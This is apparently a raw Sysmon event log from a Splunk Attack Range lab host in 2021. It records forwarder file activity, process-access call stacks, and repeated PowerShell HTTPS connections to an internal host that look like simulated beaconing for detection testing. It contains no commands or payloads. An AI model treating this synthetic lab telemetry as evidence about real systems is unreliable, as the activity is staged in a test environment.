Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE91342DDC18DE1C3C406CA9CF1A220B,SHA256=9A81D74F69A337E8F362961A65353AB5B78366548320427BBB2EA5ACFEA4D606,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:15.918{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50449-false10.0.1.12-8000- 23542300x800000000000000036496744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:46.674{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5966F76468A655F40190D02A61711BDB,SHA256=56F8F64FE018A0EF8DB216E2114A7AD56BEF45A4B5FF65751C7C69FB11464691,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:47.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B3BB2509B3FD43E625B9DD0D7A204D7,SHA256=C4FAD24A4B5C2B2A72F26DD0F4DF5FBB40B6CC6483BF58AFCCBED7173C9B64E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:48.841{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9568FD96B9376E67D52545C0F7F1AB91,SHA256=7970B6A0A085F1A6BEA24B9ABDD75E2A1764BAA9A9303221853873A14040BCD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:48.722{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D32DC12FD6FEB3B54F21558D406285F,SHA256=CC8B1FCCBCC3EFF9991E38E8DCA714224DFA08288F6B33EF0C54E5E5958BBD34,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:19.406{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50450-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:49.725{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BE8705824E30C98412F152D338B1192,SHA256=27262D8AB51BC167CDFA4E22EC1E393D0F74CE5DE66EC85F901FACF4C8AFA803,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:50.755{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAD2ECB98ABE1F3463228719552D344A,SHA256=21E33C0AA349C99B8337B2ED5440EEA86933F075DFF539A4B592C35C1C711803,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:51.801{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66A504D0F1D676CFFFF2F8AD91D150A8,SHA256=8D8219F658715105C55F34F0A1BC0AECAF54AF8C6BD914DDE4C1BAF63AD1CE7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:52.817{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F9C53D14A158C0D5D1F2565D1EC9A36,SHA256=579082B13D86AD4233C5C058C8E545A29A454CAF2530F0D6040DC4C7CC86E5F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:21.921{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50451-false10.0.1.12-8000- 23542300x800000000000000036496754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:53.836{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B71124AD041C9B90341B3E2539E8D4BE,SHA256=DBBFA9F3FB4A61F6B488658115FBD0239B772C1682DB3B2E929E558D36B101CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:54.965{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3C5E114E68ABA40D95C8FC8F845C1F85,SHA256=89ECF6CF950D0170E6457C17527A3E07AFD1EF5659D22E5CC4950EE8D039CFDF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:54.850{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1684EFA02EF170CD5DBCDF62554D3AEA,SHA256=3CA40F5633925C289FADADD0F433508472650DD29212A7403BF11240CB6CC2D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:55.880{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37505135BB8EB6EB3100BB5CBD0503D6,SHA256=5F66E34505F2D4FEC57E61C88A188E141CBF516EBB20D467FEE59C8E9FE98B63,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:25.417{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50452-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:56.894{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6858F6A39F474234079C4063A5F45E6,SHA256=C26A621141A31424A3A23248FE3D7F933DDF22AF60328C04219DC47FBA08897B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:56.279{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF8a2f9327.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:57.911{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51806C1F2ED0AEA4FEFF2FFEC7FE6DEE,SHA256=47DA788EA94EE777BCEA2B8C546AC6DC38077E8C9B07F5A57FC4EAA3050D611B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:27.714{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50453-false10.0.1.12-8000- 23542300x800000000000000036496763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:58.930{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89DAC47A92B9116C558444384A2DDA60,SHA256=CC0F9563447E489D06E16F8146AD188E64472542BDC55DC25F8864D92DB2590B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:59.945{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18BDFBC8702D6D6EAAC2CE46AE5A01AA,SHA256=3612CDB3379A6DD44994FB674B3C19FE6FD9DA257040430A40DA6C681B144578,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:59.761{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CD0B5964D4CE1ECF2A19B9D141B806DC,SHA256=D100C35DAC50C8F9F75DB6602A785EBCA5F18DC285161A54AA07F7D51AAE5A2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:00.959{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C492B14D84669A73320FEBFBA013D06D,SHA256=894BB7455B12B57AD25E9D7FACD6A573FB4D7380F45CD599A70A04E08D29159E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:30.427{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50454-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:01.974{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B65848EFEEC0135296A49DB4CB4DA172,SHA256=50613ABEFAB4B3ED8AEF182B3E1B971A5E54C14078483922946F923E2F82F0F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:03.010{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22DB7DFD951C391F3B57FC12EDFECE03,SHA256=15A441B835E1A8E35B4C89B499073C5C3F53B81DFD053924A0D58C1CF6711BA4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:04.024{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27222EBBBD6D63AABC0C02794DC0526D,SHA256=99B80CFCB1AC109A7A555E61F1A97F5F528286BCA3D5C811CBB1740A717EB155,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:33.739{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50455-false10.0.1.12-8000- 23542300x800000000000000036496773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:05.769{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=25BD7137D61443F0A64F553C046788E5,SHA256=06499F1294ED0D6516A8E22139D71A88CE4E040B6F87E10EBFC0382C0F02B522,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:05.070{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0C632A4A49E1F6973F1959CF7F208B0,SHA256=AFD20907D78F571534F3C3677DC4513A7DBB08D8532809F573FEA93878E03AC6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:36.436{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50456-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:06.085{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D1FF1B14CB44DC765E05A20C0B36125,SHA256=326A2E94C07290C9E15D6755B0211DBDCD0793FE8FE42566CBF80A79D9F9773B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496784Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.967{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A01F-6140-6756-04000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496783Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.967{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496782Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.967{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.967{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.967{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.967{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A01F-6140-6756-04000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.967{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A01F-6140-6756-04000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.952{B81B27B7-A01F-6140-6756-04000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496776Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.101{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D89F62389B6232C9A2226F1F599769D,SHA256=75E71A2CC30E97F7A2AA9B05251344B6B1C95862D3A1864F30A52AE0E65032E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496796Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.982{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F7CBEAC9A14A91AE08178B328A45D6E4,SHA256=BED37D9C73B379216BB1A776B3315013C0329A6BA85F19569FEDC6D80AA593C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496795Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.982{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2424B89ED02D90BB8444C577F1AFF8E2,SHA256=2BEDE60DDC44A5202EA955C973CF3D744611F9A83FB5B3183C06447FA3B5BEBB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.651{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A020-6140-6856-04000000C801}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 